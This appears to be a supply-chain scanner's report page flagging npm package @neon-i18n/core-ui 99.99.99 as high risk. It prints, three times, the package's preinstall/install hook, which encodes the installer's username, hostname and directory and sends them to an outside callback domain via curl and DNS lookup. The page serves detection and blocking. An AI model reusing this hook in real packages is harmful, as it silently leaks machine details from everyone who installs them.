PkgRadar

npm · registry.npmjs.org

@neon-i18n/core-ui

Install Lifecycle Remote Or Exec: preinstall="b64=$(printf '%s' \"$(whoami):$(hostname):$(pwd):$npm_package_name\" | base64 -w0); pkgsub=$(printf '%s' \"$npm_package_name\" | sed 's/@//g; s|/|-|g'); pkgdns=$(printf '%s' \"$npm_package_name\" | base64 -w0 | tr '+/' '-_' | tr -d '='); curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64; nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk"

Why PkgRadar flagged 99.99.99

SeveritySignalEvidence
highInstall Lifecycle Remote Or Execpreinstall="b64=$(printf '%s' \"$(whoami):$(hostname):$(pwd):$npm_package_name\" | base64 -w0); pkgsub=$(printf '%s' \"$npm_package_name\" | sed 's/@//g; s|/|-|g'); pkgdns=$(printf '%s' \"$npm_package_name\" | base64 -w0 | tr '+/' '-_' | tr -d '='); curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64; nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk" · package.json
highInstall Lifecycle Remote Or Execinstall="b64=$(printf '%s' \"$(whoami):$(hostname):$(pwd):$npm_package_name\" | base64 -w0); pkgsub=$(printf '%s' \"$npm_package_name\" | sed 's/@//g; s|/|-|g'); pkgdns=$(printf '%s' \"$npm_package_name\" | base64 -w0 | tr '+/' '-_' | tr -d '='); curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64; nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk" · package.json
highInstall Lifecycle Repeated Payloadpreinstall,install="b64=$(printf '%s' \"$(whoami):$(hostname):$(pwd):$npm_package_name\" | base64 -w0); pkgsub=$(printf '%s' \"$npm_package_name\" | sed 's/@//g; s|/|-|g'); pkgdns=$(printf '%s' \"$npm_package_name\" | base64 -w0 | tr '+/' '-_' | tr -d '='); curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64; nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk" · package.json

Scanned versions

VersionVerdictScoreScanned (UTC)
99.99.99High risk952026-05-28

Block this in CI

PkgRadar gates @neon-i18n/core-ui (and every other dependency) before it merges. One line in your pipeline:

pkgradar gate --ecosystem npm @neon-i18n/[email protected]